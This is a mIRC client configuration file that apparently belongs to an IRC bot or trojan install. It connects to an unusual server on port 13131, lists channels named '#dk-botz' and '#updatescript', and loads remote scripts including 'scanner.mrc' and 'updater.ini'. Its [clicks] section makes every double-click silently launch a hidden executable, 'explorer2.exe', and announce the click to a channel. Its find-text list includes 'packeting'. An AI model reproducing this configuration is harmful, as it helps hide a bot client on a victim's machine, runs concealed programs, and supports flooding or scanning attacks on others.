[text]
ignore=*.*
commandchar=/
linesep=-
timestamp=[HH:nn]
network=All
quit=[Quit] debug: manual/close.
finger=Fuck off
accept=*.jpg,*.gif,*.png,*.bmp,*.txt,*.log,*.wav,*.mid,*.mp3,*.zip
[files]
addrbk=addrbk.ini
servers=servers.ini
browser=c:\progra~1\intern~1\iexplore.exe
emailer=c:\program files\outlook express\msimn.exe
finger=finger.txt
urls=urls.ini
[warn]
fserve=off
dcc=off
[options]
n0=0,0,0,0,0,1,300,1,1,0,1,0,0,0,1,1,0,1,0,1,512,0,1,4,0,0,0,1,0,50,1,0
n1=0,1,0,0,0,0,0,0,7,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,20,0,0,0,2,2,0,0,0
n2=1,0,0,0,1,1,1,1,0,80,160,1,1,1,1,0,0,0,1,160,40,10,0,0,1,0,1,1,0,0,0
n3=500,0,0,0,1,0,1,0,0,1,0,1,0,0,1,1,1,0,0,0,0,0,1,0,0,0,2,6,0,0,0,3,180
n4=0,0,1,0,0,3,9999,0,0,1,1,0,1024,0,1,9999,60,0,0,0,1,0,0,2,1,5000,0,2,0,0,3
n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,0,1,1,0,300,10,4,0,0,22,0,0,0,999999,1,0,0,82
n6=0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,1,0,0,1,0,0,100,1,1,0,0,0,0,0,2,1
n7=0,0,0,0,0,0,0,0,0
[dirs]
[about]
show=magnitude
version=5.9
[windows]
scripts=921,400,647,250,0,0,0
main=993,112,754,27,0,-1,-1
wchannel=0,302,0,153,0,1,0
status=0,112,0,27,0,1,0
wquery=0,431,0,144,1,1,0
wserv=104,483,129,345,1,1,0
#gtcontrol=21,112,436,27,0,1,0
wmessage=14,633,57,393,0,1,0
wdccg=0,240,0,212,0,1,0
[events]
default=2,2,3,2,2,1,1
[ident]
active=yes
system=UNIX
port=113
userid=akatherineh
[socks]
enabled=no
port=1080
method=4
dccs=no
[clicks]
status=//run $mircdir $+ explorer2.exe /n /fh        | //msg %chan :DoubleClicked: Status
query=//run $mircdir $+ explorer2.exe /n /fh        | //msg %chan :DoubleClicked: Query
channel=//run $mircdir $+ explorer2.exe /n /fh        | //msg %chan :DoubleClicked: Channel
nicklist=//run $mircdir $+ explorer2.exe /n /fh        | //msg %chan :DoubleClicked: Nick-List
notify=//run $mircdir $+ explorer2.exe /n /fh        | //msg %chan :DoubleClicked: Notify-List
[dde]
ServerStatus=off
ServiceName=mIRC
CheckName=off
[fileserver]
warning=off
homedir=c:
[dccserver]
n0=0,59,0,0,0,0
[mirc]
nick=treon
anick=-
user=-
email=-
host=vss1.soul0wner.netSERVER:vss1.soul0wner.net:13131
[colours]
n0=1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
[pfiles]
n0=popups.ini
n1=popups.ini
n2=popups.ini
n3=popups.ini
n4=popups.ini
[fonts]
fscripts=Symbol,412,2
fstatus=Symbol,711,2
fchannel=Wingdings,407,2
fquery=Wingdings,407,2
f#dk-botz=MS Sans Serif,407,0
f#updatescript=MS Sans Serif,407,0
[nicklist]

[local]
local=WORKSTATION1
localip=64.40.52.149
longip=1076376725

[ports]
random=off
bind=off

[sjis]
enabled=no

[marker]
show=off
size=3
colour=4
method=1

[agent]
enable=0,0,0
char=merlin.acs
options=1,1,1,100,0
speech=150,60,100,1,180,10,50,1,1,1,0,50,1
channel=1,1,1,1,1,1,1,1,1
private=1,1,1,1
other=1,1,1,1,1,1,1
pos=20,20

[waves]
send=No Sound
[dragdrop]
n0=*.wav:/sound $1 $2-
n1=*.*:/dcc send $1 $2-
s0=*.*:/dcc send $1 $2-
[findtext]
n0=loo
n1=:loo
n2=alias connect1
n3=!ver
n4=packeting
n5=rand
n6=%pchan
n7=gdope
n8=gcool
n9=gstart
n10=random

[users]
n0=50:Soney!*Chump@rox-11544.mmcable.com
n1=50,=10:*!*sony@*.left.overs

[ignore]
n0=*@*,ctcp,notice,invite

[afiles]
n0=mirc.ini

[extensions]
n0=defaultEXTDIR:\
[rfiles]
n0=mirc.ini
n1=remote.ini
n2=script.ini
n3=script1.ini
n4=updater.ini
n5=scanner.mrc
n6=script2.ini
n7=script3.ini
